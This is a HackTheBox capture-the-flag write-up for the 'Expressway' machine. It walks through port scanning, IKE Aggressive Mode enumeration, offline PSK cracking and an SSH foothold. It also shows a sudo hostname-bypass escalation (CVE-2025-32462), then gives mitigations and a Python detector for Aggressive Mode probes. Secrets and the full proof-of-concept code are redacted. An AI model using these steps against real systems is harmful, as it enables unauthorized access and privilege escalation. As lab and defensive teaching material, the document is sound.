Expressway HTB Writeup | HacktheBox | Season 9

2025-09-27 05:41:38 - xone

1. Recon

Start with a fast TCP and UDP sweep to find services.

nmap -sS -sU -T4 -p- --min-rate 1000 expressway.htb -oA scans/expressway/full
nmap -sC -sV -p22,500 expressway.htb -oA scans/expressway/services

Result: SSH on 22/tcp and an IKE/ISAKMP responder on 500/udp.

2. IKE enumeration (Aggressive Mode)

Because UDP/500 was open, probe the service with ike-scan. Aggressive Mode often returns identity strings and data useful for offline PSK cracking.

# Main Mode
ike-scan -M expressway.htb

# Aggressive Mode (more verbose / leak-prone)
ike-scan -A expressway.htb > ike-agg.txt

Aggressive Mode returned an identity of ike@expressway.htb and produced an output I saved for cracking.

3. Capture → Crack PSK

Save the Aggressive Mode output and run it through your PSK cracking workflow (tooling varies — some tools accept raw ike-scan output; others want pcap conversions).

# output from ike-scan already saved to ike-agg.txt
# feed ike-agg.txt into your preferred PSK-cracking tool with a wordlist
psk-crack-tool -i ike-agg.txt -w /usr/share/wordlists/rockyou.txt -o cracked.txt
# cracked.txt -> PSK: [REDACTED-PSK]

Important: The PSK recovered in the lab is redacted here as [REDACTED-PSK]. Never publish real shared secrets.

4. SSH foothold as ike

With the PSK-derived credentials (or the VPN-authenticated session), authenticate to the host and obtain an interactive shell.

ssh ike@expressway.htb
# (authentication method/cleartext password omitted for safety)

Once on the box:

id
hostname
ls -la /home/ike
cat /home/ike/user.txt    # user flag

user.txt was present in /home/ike.

5. Local enumeration

Standard enumeration gave the clues needed for escalation:

uname -a
cat /etc/os-release
sudo -V           # shows Sudo 1.9.17
ps aux
find / -perm -4000 -type f 2>/dev/null
grep -R "offramp" /var/log 2>/dev/null  || true

Important find: logs contained the hostname offramp.expressway.htb, which became useful for the Sudo bypass.

6. Privilege escalation — Sudo hostname bypass (CVE-2025-32462)

Sudo 1.9.17 is affected by a hostname-bypass flaw (CVE-2025-32462). Using the hostname discovered in the logs, the bypass was exercised to escalate to root.

Conceptual (non-weaponized) demonstration:

# confirm sudo version
sudo -V

# attempt host-bypass style invocation (lab PoC)
# NOTE: real PoC code is not pasted here to avoid unsafe distribution
/usr/local/bin/sudo -h offramp.expressway.htb -i
# -> root shell in the lab

After gaining a root shell:

cat /root/root.txt   # root flag

An alternate local exploit (CVE-2025-32463) was also tested and worked as a fallback.

7. Post-exploit notes

user.txt found at /home/ike
root.txt found at /root

All sensitive outputs and credentials have been redacted in this public writeup.

Mitigations & recommendations

  1. Replace PSKs with certificate-based IKE authentication, or use long, random PSKs rotated regularly.
  2. Disable Aggressive Mode in IKE where not required — it exposes identifying data that eases offline attacks.
  3. Patch Sudo to the vendor-fixed versions that address CVE-2025-32462 / CVE-2025-32463.
  4. Treat logs as sensitive — avoid leaking internal hostnames and identifiers into world-readable logs.
  5. Network segmentation & filtering: restrict UDP/500 to trusted peers and monitor unusual IKE attempts.
  6. Harden SSH: limit access, use key-based auth + MFA, and log/alert on anomalous logins.
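
As a defender-side complement to items 2 and 5, the following added example (not part of the original writeup) decodes the ISAKMP header of UDP/500 datagrams and flags sources that send IKEv1 Aggressive Mode phase 1 openers, the pattern an `ike-scan -A` probe like the one above produces. The sample datagrams and source addresses are constructed for the test.

```python
import struct
from collections import Counter

# ISAKMP fixed header (RFC 2408 sec. 3.1): initiator SPI, responder SPI, next
# payload, version, exchange type, flags, message ID, total length. 28 bytes.
ISAKMP_HEADER = struct.Struct("!8s8sBBBBII")
EXCHANGE_TYPES = {2: "Identity Protection (Main Mode)", 4: "Aggressive", 5: "Informational"}
AGGRESSIVE = 4

def parse_isakmp_header(datagram: bytes) -> dict:
    """Decode the ISAKMP header at the start of a UDP/500 payload."""
    if len(datagram) < ISAKMP_HEADER.size:
        raise ValueError("datagram shorter than the ISAKMP header")
    i_spi, r_spi, _nxt, version, exch, _flags, msg_id, _length = ISAKMP_HEADER.unpack_from(datagram)
    return {
        "initiator_spi": i_spi.hex(),
        "responder_spi": r_spi.hex(),
        "major": version >> 4,            # 1 for IKEv1, 2 for IKEv2
        "exchange_type": exch,
        "exchange_name": EXCHANGE_TYPES.get(exch, f"unknown({exch})"),
        "message_id": msg_id,
    }

def aggressive_mode_initiators(datagrams, threshold=1) -> dict:
    """Return {src_ip: count} for sources sending >= threshold IKEv1 Aggressive
    Mode openers (all-zero responder SPI, message ID 0), i.e. the probe pattern
    that an Aggressive Mode scan against the responder produces."""
    counts = Counter()
    for src, payload in datagrams:
        hdr = parse_isakmp_header(payload)
        opener = hdr["responder_spi"] == "00" * 8 and hdr["message_id"] == 0
        if hdr["major"] == 1 and hdr["exchange_type"] == AGGRESSIVE and opener:
            counts[src] += 1
    return {src: n for src, n in counts.items() if n >= threshold}

def build_header(exchange_type: int, i_spi: bytes = b"\x11" * 8) -> bytes:
    """Constructed sample: a bare IKEv1 phase 1 opener header (no payloads)."""
    # next payload 1 = SA, version 0x10 = IKEv1, flags 0, message ID 0
    return ISAKMP_HEADER.pack(i_spi, b"\x00" * 8, 1, 0x10, exchange_type, 0, 0, ISAKMP_HEADER.size)

# Constructed traffic: one Main Mode opener and two Aggressive Mode openers.
SAMPLE_DATAGRAMS = [
    ("10.0.0.5", build_header(2)),
    ("10.0.0.9", build_header(AGGRESSIVE)),
    ("10.0.0.9", build_header(AGGRESSIVE)),
]

if __name__ == "__main__":
    for src, n in aggressive_mode_initiators(SAMPLE_DATAGRAMS).items():
        print(f"ALERT: {src} sent {n} IKEv1 Aggressive Mode proposal(s)")
```

In production the datagram list would come from a packet capture or a UDP/500 socket on the VPN gateway; the header decode is the same.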

